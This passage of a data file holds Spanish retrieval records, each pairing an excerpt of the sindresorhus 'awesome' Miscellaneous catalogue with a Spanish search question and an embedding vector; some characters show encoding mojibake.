0.09248, -0.0114, 0.08621, -0.0115, -0.01119, 0.06399, 0.03248, -0.02773, -0.09088, 0.00464, 0.04051, 0.09292, -0.01968, -0.0311, -0.03625, 0.05105, -0.00615, 0.00531, 0.01249, -0.02915, 0.0946, 0.00937, -0.03896, 0.01621, 0.07438, -0.08837, -0.02407, -0.02687, 0.08517, -0.00152, -0.03117, -0.09949, -0.08498, 0.03294, 0.08363, -0.02379, 0.01148, -0.05692, -0.07119, -0.09619, -0.00507, 0.02228, -0.06748, -0.06413, 0.00883, 0.04598, -0.04192, 0.05168, -0.02526]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Domain-Driven Design β€” Software development approach for complex needs by connecting the implementation to an evolving model. Quantified Self β€” Self-tracking through technology. Web Design β€” For digital designers. Creative Coding β€” Programming something expressive instead of something functional. No-Login Web Apps β€” Web apps that work without login. Free Software β€” Free as in freedom. Framer β€” Prototyping interactive UI designs. Markdown β€” Markup language. Dev Fun β€” Funny developer projects. Magento 2 β€” Open Source eCommerce built with PHP. TikZ β€” Graph drawing packages for TeX/LaTeX/ConTeXt. Ad-Free β€” Alternatives without ads. Prometheus β€” Open-source monitoring system. Homematic β€” Smart home devices. Ledger β€” Double-entry accounting on the command-line. Web Monetization β€” A free open web standard service that allows you to send money directly in your browser. Uncopyright β€” Public domain works. Crypto Currency Tools & Algorithms β€” Digital currency where encryption is used to regulate the generation of units and verify transfers.", "indexar": "con que puedo llevar a cabo el seguimiento personal mediante tecnologΓ­a?", "v": [-0.04122, 0.20938, -0.21659, -0.09569, 0.01479, -0.04348, 0.08739, 0.00929, -0.01959, -0.09689, -0.15807, 0.03667, 0.00836, 0.02402, 0.06143, 0.01176, 0.10723, -0.07003, 0.08533, 0.01427, 0.00987, -0.01121, -0.13608, -0.08698, 0.11614, 0.02101, 0.03999, -0.09186, -0.14907, -0.02907, 0.02939, -0.03695, 0.01073, 0.00545, -0.10628, -0.08713, -0.04561, 0.11422, -0.03613, 0.00323, 0.01145, -0.10677, 0.00575, 0.06085, 0.21157, -0.01827, 0.01371, 0.03267, 0.0006, 0.00881, -0.0898, 0.07231, -0.0839, -0.03254, -0.04606, -0.03328, 0.09631, -0.05592, 0.08608, -0.10676, -0.02244, 0.00698, -0.00397, 0.0342, 0.06136, -0.00819, 0.03377, -0.0747, -0.13043, -0.10907, 0.06622, -0.08518, -0.08336, 0.01732, 0.0079, 0.03218, -0.00179, 0.04986, 0.08235, -0.02241, -0.09721, -0.00808, -0.06739, -0.02216, -0.10591, 0.0143, 0.11187, -0.02335, 0.03581, -0.10332, 0.12142, 0.09155, -0.00558, -0.08115, -0.00982, 0.09535, 0.03031, -0.039, -0.02407, 0.10005, 0.08811, 0.00469, 0.02377, 0.02936, -0.01652, 0.03134, 0.01588, -0.09012, 0.07922, -0.03675, -0.05212, 0.08354, -0.05188, -0.06315, -0.08985, 0.01624, -0.09546, -0.11487, -0.06222, -0.00237, -0.09033, -0.03034, 0.00255, -0.05847, 0.09907, -0.03544, -0.12967, 0.01587, 0.01919, -0.01155, 0.03384, -0.02897, -0.0168, -0.02479, 0.04466, 0.04795, -0.03088, -0.0504, 0.02906, -0.03635, 0.0669, 0.05464, -0.04206, -0.03776, 0.05766, -0.09181, -0.06325, -0.04105, -0.06178, -0.00194, -0.02328, 0.02897, -0.04089, 0.0289, -0.05459, -0.0128, 0.02318, -0.027, 0.00013, 0.03663, -0.05913, 0.06126, -0.0366, 0.0569, 0.02134, -0.04291, 0.02725, -0.00269, 0.05943, 0.0146, -0.15502, 0.04663, -0.01882, -0.05132, -0.00512, -0.03643, -0.11884, 0.02471, 0.03054, -0.08016, -0.11717, 0.07975, -0.01083, -0.04158, 0.02264, -0.05617, -0.07753, 0.02081, 0.03001, 0.03737, -0.006, 0.0253, 0.02407, 0.04959, -0.04104, -0.04576, -0.03392, 0.00997, -0.03338, 0.04391, -0.05614, 0.0629, -0.02741, -0.0377, 0.00188, 0.04158, -0.04402, 0.00315, -0.0078, -0.0109, 0.02096, -0.0789, 0.05783, -0.03339, -0.06297, 0.02198, 0.01101, -0.05259, -0.03088, 0.05804, 0.09021, 0.01644, 0.05587, 0.02117, -0.01006, 0.06794, 0.06136, 0.05806, -0.00741, -0.06223, -0.01887, 0.04882, -0.00023, -0.04384, 0.03361, 0.03834, -0.00788, -0.04209, -0.10113, -0.0407, 0.01467, 0.07111, -0.05369, -0.0247, -0.02597, -0.04293, -0.11951, 0.04053, 3e-05, -0.08708, 0.00532, 0.06608, 0.00956, -0.07102, 0.04644, 0.01119]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Domain-Driven Design β€” Software development approach for complex needs by connecting the implementation to an evolving model. Quantified Self β€” Self-tracking through technology. Web Design β€” For digital designers. Creative Coding β€” Programming something expressive instead of something functional. No-Login Web Apps β€” Web apps that work without login. Free Software β€” Free as in freedom. Framer β€” Prototyping interactive UI designs. Markdown β€” Markup language. Dev Fun β€” Funny developer projects. Magento 2 β€” Open Source eCommerce built with PHP. TikZ β€” Graph drawing packages for TeX/LaTeX/ConTeXt. Ad-Free β€” Alternatives without ads. Prometheus β€” Open-source monitoring system. Homematic β€” Smart home devices. Ledger β€” Double-entry accounting on the command-line. Web Monetization β€” A free open web standard service that allows you to send money directly in your browser. Uncopyright β€” Public domain works. Crypto Currency Tools & Algorithms β€” Digital currency where encryption is used to regulate the generation of units and verify transfers.", "indexar": "cual es una herramienta para diseΓ±ar prototipos de interfaces interactivas?", "v": [0.28015, 0.05044, -0.13939, -0.12857, 0.21279, -0.10163, -0.05694, 0.02392, 0.01555, 0.0199, 0.03823, -0.04304, -0.06318, -0.09577, 0.03256, 0.04867, 0.16054, -0.11143, -0.01052, -0.06266, 0.00119, 0.08643, -0.17915, -0.04997, -0.02149, -0.05585, -0.01582, -0.01647, -0.10807, 0.07516, -0.03143, -0.02916, 0.11569, -0.04466, -0.14784, -0.17623, -0.03572, 0.0345, 0.04276, 0.00456, 0.00572, 0.00345, -0.07708, 0.08671, 0.05544, 0.00882, -0.02488, -0.04475, -0.03504, 0.13929, -0.08796, -0.04869, -0.05347, 0.06618, 0.05988, -0.16765, 0.21297, -0.16245, 0.02795, -0.10058, 0.01941, 0.02103, 0.02079, -0.06492, 0.01947, -0.09149, -0.13072, -0.09417, -0.06641, -0.00488, 0.06421, 0.03549, 0.06954, -0.07155, 0.07241, 0.04714, -0.00762, 0.00182, 0.07862, 0.03565, 0.0021, -0.07381, -0.053, -0.00027, -0.01303, -0.02036, 0.02314, 0.01904, -0.01313, -0.03649, -0.03766, 0.03306, -0.0283, 0.02085, -0.06663, -0.04091, 0.05915, 0.07051, 0.05717, -0.03664, -0.03212, -0.06362, -0.12818, 0.0291, -0.00373, -0.00758, 0.00803, 0.04732, -0.0005, -0.02702, 0.05416, 0.01101, 0.0655, -0.01494, -0.05092, 0.02858, 0.0095, -0.01598, -0.01754, -0.07509, -0.0007, 0.06093, -0.02263, -0.06841, 0.02953, 0.06688, -0.06196, 0.07058, -0.00394, -0.0281, -0.02293, -0.05448, -0.00899, 0.03039, -0.01722, 0.04426, 0.04503, -0.05874, 0.01112, -0.04869, 0.07286, 0.07794, 0.02404, -0.10834, -0.06869, 0.02517, 0.02746, -0.00346, -0.06155, 0.07562, -0.00218, 0.00039, 0.01676, -0.0082, -0.08565, -0.01383, -0.05251, 0.01205, -0.05005, 0.05356, -0.08224, 0.02062, 0.05425, 0.02915, 0.04161, -0.05729, -0.02517, -0.04855, 0.05162, 0.01993, 0.04993, 0.02744, 0.04681, 0.00907, 0.03096, 0.01133, -0.03174, -0.01285, -0.02274, -0.10716, -0.03335, 0.09029, -0.08132, -0.00904, -0.0037, -0.11346, 0.0067, -0.0053, 0.00713, 0.03378, -0.06957, 0.07817, 0.02276, 0.00982, 0.10001, -0.02152, 0.07763, 0.0039, -0.04556, -0.01665, -0.0165, 0.01409, -0.0217, -0.06259, -0.00083, 0.05404, 0.01581, 0.02308, -0.0174, 0.04688, 0.02284, -0.01534, 0.05108, 0.00725, 0.0295, -0.01141, -0.01734, -0.02483, 0.05607, 0.00571, 0.02134, 0.00044, 0.03492, -0.02802, 0.02697, 0.07044, 0.02584, 0.03071, -0.03758, -0.05027, 0.0405, -0.02519, -0.00422, 0.02183, 0.04458, -0.00371, -0.00911, -0.01918, -0.04948, -0.08077, -0.02392, 0.1248, -0.02604, 0.01233, -0.00055, -0.09916, -0.02505, -0.06012, -0.05143, -0.09164, -0.04733, 0.01415, 0.08886, -0.043, 0.00413, -0.03526]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Open Source Supporters β€” Companies that offer their tools and services for free to open source projects. Design Principles β€” Create better and more consistent designs and experiences. Theravada β€” Teachings from the Theravada Buddhist tradition. inspectIT β€” Open source Java app performance management tool. Open Source Maintainers β€” The experience of being an open source maintainer. Calculators β€” Tools for every platform. Captcha β€” A type of challenge–response test used in computing to determine whether or not the user is human. Jupyter β€” Create and share documents that contain code, equations, visualizations and narrative text. FIRST Robotics Competition β€” International high school robotics championship. Speakers β€” Conference and meetup speakers in the programming and design community. Board Games β€” Table-top gaming fun for all. Software Patreons β€” Fund individual programmers or the development of open source projects. Parasite β€” Parasites and host-pathogen interactions. Food β€” Projects on GitHub related to food.", "indexar": "que programa puedo usar para crear documentos con cΓ³digo y grΓ‘ficos", "v": [0.03498, 0.05135, -0.07262, -0.19572, 0.03372, -0.19223, 0.0959, 0.0002, -0.08203, -0.10282, -0.13486, -0.14794, -0.04502, -0.17052, -0.03335, -0.0549, 0.12337, -0.16336, 0.00308, 0.00499, 0.02426, -0.01451, -0.04556, -0.08569, -0.07733, -0.00801, 0.04979, -0.07188, -0.05534, -0.00124, -0.00727, 0.04262, 0.04746, -0.06651, -0.11631, 0.00315, 0.1242, 0.01239, -0.08156, 0.07045, 0.01966, 0.01139, -0.12137, 0.06573, 0.00445, 0.03311, 0.02139, 0.10598, -0.07042, -0.02849, -0.00917, -0.06384, -0.09803, 0.05092, -0.00843, -0.14104, 0.05586, -0.16771, -0.12098, 0.02597, 0.0353, 0.02338, 0.00828, -0.03362, -0.047, -0.00983, 0.12183, 0.01829, -0.10212, 0.05904, -0.00447, 0.06049, 0.00442, -0.07171, 0.09413, 0.06426, -0.12334, -0.10413, -0.02555, 0.03671, -0.02594, 0.02448, -0.04517, 0.00035, -0.10188, -0.09724, -0.00111, -0.02231, 0.02205, -0.10373, 0.04017, 0.0165, -0.01103, 0.038, 0.05345, 7e-05, 0.06264, 0.02816, 0.06864, 0.04053, 0.02094, -0.05616, -0.0535, 0.05799, 0.05414, 0.04405, 0.0836, -0.02716, -0.07732, 0.07022, -0.04632, -0.04384, -0.0971, 0.05989, -0.07674, -0.02855, 0.03708, -0.00138, 0.01693, -0.13643, -0.03234, 0.05484, -0.07485, 0.08327, 0.04481, 0.00535, 0.00699, 0.1419, -0.08344, 0.04997, -0.051, 0.01284, -0.08438, -0.03488, -0.05134, -0.0164, 0.01394, -0.0452, 0.03224, 0.01236, -0.00131, 0.01929, 0.04832, 0.06751, 0.00186, 0.06596, -0.0428, -0.04782, -0.05264, -0.01639, 0.01041, 0.0226, -0.05455, 0.01047, -0.06688, 0.01825, 0.03596, -0.00846, -0.09605, -0.05594, -0.05976, 0.06401, -0.06494, 0.04254, 0.05194, -0.04912, -0.02856, 0.02885, 0.0519, 0.0645, 0.03799, 0.05254, 0.10091, -0.09546, 0.08578, -0.06615, -0.03427, -0.04017, -0.06134, -0.04467, -0.07143, 0.0471, 0.08322, -0.00296, -0.05389, -0.04891, 0.03785, 0.01958, 0.05607, -0.03436, -0.05608, 0.09049, 0.00886, 0.04327, -0.00751, -0.03833, 0.05347, -0.00322, 0.00444, -0.109, -0.03832, 0.04342, -0.021, -0.06745, 0.09636, 0.10553, -0.05391, 0.03834, 0.02482, 0.07616, -0.00833, -0.06609, 0.05459, -0.01893, -0.07432, -0.03548, -0.01379, 0.04419, 0.07749, -0.04446, 0.04291, -0.00553, -0.03146, 0.02384, 0.05313, -0.06888, 0.02201, 0.05599, 0.00706, 0.01656, -0.00233, 0.03203, -0.01191, -0.00132, 0.00535, 0.05411, -0.01035, -0.07138, -0.02505, -0.10096, -0.01377, 0.07783, -0.04289, -0.03097, -0.00908, -0.01193, -0.06268, -0.0333, 0.01788, -0.02441, 0.00888, 0.01538, 0.08397, -0.06543, 0.00583, 0.01422]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Open Source Supporters β€” Companies that offer their tools and services for free to open source projects. Design Principles β€” Create better and more consistent designs and experiences. Theravada β€” Teachings from the Theravada Buddhist tradition. inspectIT β€” Open source Java app performance management tool. Open Source Maintainers β€” The experience of being an open source maintainer. Calculators β€” Tools for every platform. Captcha β€” A type of challenge–response test used in computing to determine whether or not the user is human. Jupyter β€” Create and share documents that contain code, equations, visualizations and narrative text. FIRST Robotics Competition β€” International high school robotics championship. Speakers β€” Conference and meetup speakers in the programming and design community. Board Games β€” Table-top gaming fun for all. Software Patreons β€” Fund individual programmers or the development of open source projects. Parasite β€” Parasites and host-pathogen interactions. Food β€” Projects on GitHub related to food.", "indexar": "hay alguna herramienta de gestiΓ³n del rendimiento para aplicaciones Java gratuita", "v": [-0.11144, 0.10575, -0.0598, -0.3422, -0.00031, -0.06465, -0.09351, 0.02196, -0.05937, -0.02511, -0.0628, -0.15251, 0.00296, 0.03155, 0.06852, 0.09475, 0.09387, -0.09586, -0.04208, 0.00852, -0.05578, 0.09006, -0.0981, -0.08649, -0.12529, 0.11917, 0.02921, -0.01627, -0.16074, -0.01408, 0.08162, -0.02711, 0.10138, -0.12881, -0.11298, -0.00507, 0.01762, -0.02216, -0.01548, 0.03838, 0.04062, 0.04211, 0.02074, -0.0213, 0.04032, 0.06373, 0.07016, 0.06272, -0.0595, -0.04249, -0.05351, -0.11953, -0.05591, 0.00214, 0.02142, -0.13222, 0.06881, -0.13003, 0.03193, -0.18456, -0.11589, 0.06575, -0.07963, -0.10157, 0.06446, -0.05005, 0.09766, -0.05616, -0.08344, 0.06715, 0.04931, 0.0869, -0.04185, 0.01728, 0.04837, -0.00108, 0.00399, 0.08928, 0.01193, 0.00452, 0.00822, -0.08559, 0.00667, 0.002, -0.10411, -0.07882, 0.02364, -0.03698, 0.0934, 0.00243, -0.04887, -0.01388, -0.06988, 0.01254, -0.00746, -0.02189, 0.12066, 0.01043, 0.11725, 0.05105, 0.03943, -0.05519, -0.07308, -0.0328, -0.0502, 0.12065, -0.01934, -0.09858, -0.09741, 0.01542, 0.07394, -0.08496, 0.06242, 0.06345, -0.04569, 0.02136, -0.00703, -0.06714, -7e-05, -0.04274, -0.05033, -0.06361, -0.02558, -0.06226, 0.03611, -0.01318, -0.02041, 0.15118, 0.0244, -0.02273, 0.00739, -0.08426, -0.0756, 0.03706, -0.06782, 0.02758, 0.05869, -0.06135, 0.00222, -0.04372, -0.06106, 0.06957, -0.00147, 0.00944, 0.06473, -0.01381, 0.04883, -0.00349, 0.02743, -0.00616, 0.07827, -0.10582, -0.0195, 0.02676, -0.08525, -0.02461, 0.01891, -0.00297, -0.06434, 0.0038, -0.04134, -0.03164, -0.03858, 0.04706, -0.03222, -0.03693, 0.05907, 0.05049, 0.03446, 0.12218, 0.00614, 0.03877, 0.06427, -0.07098, -0.0211, -0.0909, 0.00205, -0.00409, 0.02163, -0.08248, -0.00776, -0.044, 0.0113, -0.05924, 0.00363, -0.06058, 0.01285, -0.01864, -0.03533, 0.02228, 0.03128, 0.06204, 0.03822, -0.05691, 0.04181, -0.0009, -0.01684, -0.11416, -0.02191, 0.01004, -0.0708, -0.02864, -0.05427, -0.02965, 0.0374, 0.07972, 0.00532, 0.00139, -0.01094, 0.06639, 0.00961, 0.07429, 0.01434, 0.01269, 0.01035, -0.06008, 0.02707, 0.0206, 0.01992, -0.02036, -0.01598, -0.03081, 0.01138, 0.00026, 0.02826, 0.01738, 0.0076, 0.0107, -0.00188, -0.00391, 0.05345, -0.02281, -0.02131, -0.02475, 0.00515, -0.02009, 0.05094, -0.02106, -0.01474, -0.02687, -0.05092, 0.05975, 0.0518, -0.01824, -0.06975, -0.04921, -0.02461, -0.04859, -0.02319, -0.0848, -0.00525, 0.0203, 0.04818, -0.00276, -0.00605, -0.02395]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Open Source Supporters β€” Companies that offer their tools and services for free to open source projects. Design Principles β€” Create better and more consistent designs and experiences. Theravada β€” Teachings from the Theravada Buddhist tradition. inspectIT β€” Open source Java app performance management tool. Open Source Maintainers β€” The experience of being an open source maintainer. Calculators β€” Tools for every platform. Captcha β€” A type of challenge–response test used in computing to determine whether or not the user is human. Jupyter β€” Create and share documents that contain code, equations, visualizations and narrative text. FIRST Robotics Competition β€” International high school robotics championship. Speakers β€” Conference and meetup speakers in the programming and design community. Board Games β€” Table-top gaming fun for all. Software Patreons β€” Fund individual programmers or the development of open source projects. Parasite β€” Parasites and host-pathogen interactions. Food β€” Projects on GitHub related to food.", "indexar": "con que herramienta puedo calcular cosas desde cualquier plataforma", "v": [0.01675, 0.20409, -0.17671, -0.08767, -0.02681, -0.11746, 0.07073, -0.00619, -0.13377, -0.09145, -0.08747, -0.07338, 0.05383, -0.00738, 0.05716, 0.0898, 0.06453, -0.14533, -0.00725, -0.01162, 0.04225, -0.07835, -0.13537, -0.11131, -0.07611, -0.09315, 0.04961, -0.01725, -0.17784, 0.03594, -0.01954, 0.01711, 0.04976, -0.06413, -0.07014, -0.04891, 0.02954, 0.08968, 0.00466, -0.07139, -0.05249, 0.07491, 0.00333, -0.00191, 0.0311, 0.06068, -0.03126, 0.01936, 0.00857, 0.00401, 0.00675, -0.15645, -0.17222, 0.00766, -0.01229, -0.12585, 0.25803, -0.06249, 0.09064, -0.10881, -0.04213, 0.06053, -0.05161, -0.06326, -0.07025, 0.04366, 0.01241, -0.03159, -0.05891, 0.08998, -0.01848, -0.00977, -0.05051, -0.03047, 0.02399, -0.04825, 0.05854, -0.0229, 0.03302, -0.05763, -0.02154, -0.04198, -0.05316, 0.00701, -0.04793, -0.07836, 0.11741, -0.0658, 0.07289, -0.05991, -0.05182, -0.04809, -0.00953, 0.0507, -0.02661, 0.00719, 0.09641, -0.0138, -0.08591, -0.07519, 0.05757, -0.04247, -0.07121, 0.01566, -0.03252, 0.04979, -0.03451, -0.05677, -0.05912, -0.08016, 0.14658, 0.0259, 0.00844, -0.05831, -0.04704, 0.08144, -0.08079, 0.00677, -0.00446, 0.00537, 0.07847, 0.04695, -0.04505, -0.05912, 0.13688, -0.00088, -0.01402, 0.1052, 0.0118, -0.01271, -0.03699, -0.07596, -0.04426, -0.00216, 0.06948, -0.05812, -0.00349, -0.0828, 0.06385, -0.06261, 0.05066, 0.03717, -0.01609, -0.15467, 0.06253, -0.05135, -0.01048, -0.03096, -0.05416, 0.02113, -0.00206, 0.00379, -0.0459, 0.08799, -0.08033, -0.01678, 0.00948, 0.03279, -0.11144, 0.05689, -0.06938, -0.01912, 0.09893, -0.00163, 0.03078, -0.03385, 0.02177, 0.02919, 0.01877, 0.02949, 0.01183, 0.09115, 0.09889, -0.09692, 0.01454, -0.06108, -0.08877, 0.013, 0.01148, -0.03725, -0.07612, -0.02174, -0.05806, -0.03273, 0.01264, 0.01307, 0.07921, -0.01864, 0.02944, 0.05604, -0.00438, 0.05284, -0.00729, -0.03424, 0.01344, 0.01968, -0.03947, -0.02133, 0.05246, -0.03527, -0.02897, 0.00458, 0.01983, -0.01444, -0.0358, 0.05889, -0.0066, -0.02075, 0.02051, 0.01015, 0.01403, -0.03266, 0.01104, -0.06794, -0.01475, -0.01793, 0.0432, -0.02754, -0.03737, -0.00187, -0.0092, 0.03995, -0.00791, -0.0274, -0.0163, 0.04666, 0.07676, 0.06202, 0.011, -0.00582, 0.04155, -0.06762, 0.04206, -0.03136, -0.00401, -0.10287, 0.05211, -0.00882, -0.09681, 0.03806, -0.02727, 0.02523, 0.07896, -0.0044, -0.01305, 2e-05, 0.01336, -0.02591, -0.05165, -0.09744, -0.02846, 0.01938, 0.09861, -0.00452, -0.02475, 0.00279]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Bitcoin Payment Processors β€” Start accepting Bitcoin. Scientific Computing β€” Solving complex scientific problems using computers. Amazon Sellers. Agriculture β€” Open source technology for farming and gardening. Product Design β€” Design a product from the initial concept to production. Prisma β€” Turn your database into a GraphQL API. Software Architecture β€” The discipline of designing and building software. Connectivity Data and Reports β€” Better understand who has access to telecommunication and internet infrastructure and on what terms. Stacks β€” Tech stacks for building different apps and features. Cytodata β€” Image-based profiling of biological phenotypes for computational biologists. IRC β€” Open source messaging protocol. Advertising β€” Programmatic media and ad tech for websites. Earth β€” Find ways to resolve the climate crisis. Naming β€” Guides for naming things in computer science. Web Archiving β€” An effort to preserve the Web for future generations. WP-CLI β€” Command-line interface for WordPress.", "indexar": "que programa sirve para procesar pagos en bitcoin", "v": [0.16526, -0.04412, -0.15765, -0.107, 0.07423, -0.19395, 0.20842, -0.14485, -0.17119, -0.15261, 0.01361, 0.00408, 0.04169, 0.00658, -0.0651, -0.06498, -0.0252, -0.01314, 0.08842, 0.01789, 0.10353, 6e-05, 0.00732, -0.08734, 0.02363, 0.14246, 0.0379, -0.01671, -0.12716, 0.10676, 0.08553, -0.08579, 0.08785, -0.12795, -0.03459, -0.03991, -0.00406, 0.01294, 0.02688, 0.09804, 0.03347, 0.04494, 0.05145, -0.00795, -0.01693, -0.08445, 0.11771, 0.04736, 0.00989, -0.12816, 0.00821, 0.02063, -0.06619, 0.12196, -0.01821, -0.03807, -0.04212, -0.17457, -0.06127, 0.03357, -0.03038, 0.07147, 0.14373, -0.08399, -0.05021, 0.01293, 0.04521, 0.05365, 0.01535, 0.04385, -0.07266, 0.14413, 0.05718, 0.01091, -0.00491, -0.01289, -0.04121, -0.01788, 0.0391, -0.04213, -0.01637, 0.05483, -0.00656, 0.1537, -0.10987, 0.02308, -0.01062, -0.0578, 0.04273, -0.006, -0.07027, 0.08834, 0.06802, 0.01239, 0.07115, 0.05889, 0.13395, -0.01141, 0.05257, 0.08672, 0.06744, -0.07467, -0.11166, 0.09773, -0.05453, 0.11729, 0.10013, 0.00683, -0.00761, -0.01801, 0.03559, -0.01737, -0.07082, -0.01318, -0.10744, -0.00466, -0.04267, -0.03689, 0.01362, 0.00169, -0.05966, 0.01859, -0.03571, -0.00432, 0.09144, -0.00052, -0.07098, 0.08839, -0.02162, 0.04132, -0.01276, 0.0111, -0.05832, -0.02461, -0.04109, -0.08593, 0.0425, 0.0182, 0.05789, 0.03703, 0.11247, 0.06428, -0.00954, 0.05066, 0.10179, 0.00821, 0.05923, -0.04106, -0.0613, -0.0323, 0.05321, 0.00447, -0.03021, 0.00139, -0.09795, -0.11275, 0.00741, -0.04285, -0.10663, 0.05232, -0.01967, 0.02923, -0.01903, -0.06042, 0.02057, -0.0118, 0.00295, 0.03145, 0.04402, 0.07398, 0.01477, 0.06135, -0.02379, -0.04899, -0.00956, -0.04372, -0.04037, -0.07464, 0.04948, -0.00276, -0.07088, 0.02784, 0.02618, -0.00265, -0.03963, 0.00386, -0.0041, 0.06123, -0.02187, 0.03902, 0.01095, 0.01373, -0.08465, -0.01185, 0.00011, -0.02803, -0.05691, -0.01862, -0.00927, -0.02043, -0.00649, 0.07268, -0.00474, 0.02715, -0.03704, 0.10578, -0.05716, 0.00981, 0.01664, 0.10019, -0.00972, -0.02302, 0.03655, 0.01721, -0.02426, -0.03534, 0.02595, 0.03889, -0.00725, 0.06558, -0.01621, 0.01013, -0.00159, 0.01028, 0.03213, -0.03615, 0.03913, 0.03547, -0.02761, -0.01336, -0.02056, -0.00433, -0.03724, -0.04787, -0.01245, -0.00574, 0.00682, -0.04817, -0.05432, -0.04117, -0.00852, 0.04447, -0.00635, -0.01158, 0.00048, 0.01347, -0.0712, -0.02385, -0.0316, -0.02303, -0.05225, 0.03613, 0.03433, 0.02832, 0.05704, 0.0377]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Bitcoin Payment Processors β€” Start accepting Bitcoin. Scientific Computing β€” Solving complex scientific problems using computers. Amazon Sellers. Agriculture β€” Open source technology for farming and gardening. Product Design β€” Design a product from the initial concept to production. Prisma β€” Turn your database into a GraphQL API. Software Architecture β€” The discipline of designing and building software. Connectivity Data and Reports β€” Better understand who has access to telecommunication and internet infrastructure and on what terms. Stacks β€” Tech stacks for building different apps and features. Cytodata β€” Image-based profiling of biological phenotypes for computational biologists. IRC β€” Open source messaging protocol. Advertising β€” Programmatic media and ad tech for websites. Earth β€” Find ways to resolve the climate crisis. Naming β€” Guides for naming things in computer science. Web Archiving β€” An effort to preserve the Web for future generations. WP-CLI β€” Command-line interface for WordPress.", "indexar": "cual es la mejor tecnologia open source para el comercio electronico y la agricultura", "v": [-0.0225, -0.07268, -0.02742, -0.16459, 0.00575, -0.16519, -0.00815, 0.06449, -0.05245, -0.00866, -0.20251, -0.17068, -0.03921, 0.0591, 0.07345, -0.09856, 0.04663, -0.18622, 0.09072, -0.01381, -0.02268, -0.016, -0.16721, -0.14012, -0.00044, -0.01986, -0.10462, -0.02043, -0.19994, 0.1382, 0.1017, -0.02949, 0.10706, -0.03573, -0.07476, 0.00035, 0.15815, 0.02618, 0.05307, -0.09013, -0.06823, -0.09813, 0.05797, -0.06868, 0.09576, -0.06385, 0.10118, 0.00298, -0.05235, 0.01299, -0.11416, -0.00695, -0.085, -0.00187, 0.14343, 0.14387, -0.03698, -0.00805, 0.11596, -0.02157, 0.03578, 0.05172, -0.00408, -0.1537, -0.03176, 0.0129, -0.06112, 0.01386, -0.04493, 0.06997, 0.13644, 0.03486, -0.03527, 0.00377, -0.04304, 0.10798, -0.00014, 0.0431, -0.01013, 0.03035, -0.02382, -0.04471, -0.05855, 0.00143, 0.03387, -0.11234, 0.02841, 0.05931, -0.07012, -0.03159, 0.03963, 0.11819, -0.03985, -0.06825, 0.16914, 0.0048, -0.08127, -0.01357, -0.02795, 0.16967, -0.0086, -0.0267, -0.07319, -0.02454, -0.02562, -0.0065, 0.02111, -0.08927, -0.05032, -0.01139, -0.06458, 0.00883, -0.02394, 0.0539, -0.02162, -0.00233, 0.04206, -0.07053, -0.03486, -0.00713, -0.06504, -0.01788, -0.00323, -0.0541, 0.11059, -0.01383, -0.02244, 0.012, 0.00999, 0.01665, 0.02784, -0.09129, 0.02746, -0.02948, 0.05118, -0.01276, 0.07632, -0.05932, -0.05638, 0.03546, 0.00544, -0.00727, -0.02992, -0.04591, 0.01645, -0.08208, -0.03915, 0.00267, -0.06214, -0.00651, -0.0154, 0.039, -0.05353, 0.00565, -0.08673, 0.01666, -0.0142, 0.00965, -0.01957, 0.07038, -0.05134, 0.06622, -0.04254, -0.04812, -0.0729, -0.03716, -0.02187, -0.00512, -0.00968, -0.03208, -0.07107, 0.03549, -0.05638, 0.01892, -0.02895, -0.00247, 0.01011, 0.02378, 0.02818, -0.03857, -0.08795, 0.03047, 0.01862, 0.04532, -0.00086, 0.003, -0.04441, -0.06032, -0.00952, 0.02441, 0.01525, 0.01144, -0.03089, 0.01844, 0.06525, -0.03809, -0.02419, 0.01487, -0.03147, 0.02504, -0.05676, -0.0189, 0.01417, -0.06486, 0.01434, 0.00859, -0.01795, -0.07176, -0.02876, -0.06228, -0.06029, -0.03235, 0.04947, 0.01451, -0.03689, -0.06386, -0.02109, -0.02613, -0.06719, -0.0428, 0.02001, -0.03071, -0.01146, 0.00055, -0.00221, 0.00628, 0.05614, 0.033, 0.02289, -0.09528, -0.07006, -0.00353, -0.01955, -0.03982, -0.04905, 0.03008, -0.02034, -0.02544, -0.05685, -0.02349, -0.00848, 0.01444, -0.01826, -0.09684, -0.00448, 0.03337, -0.12421, 0.01512, -0.04964, -0.06793, -0.05347, 0.00181, -0.00157, 0.03243, 0.03406, 0.08137]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Bitcoin Payment Processors β€” Start accepting 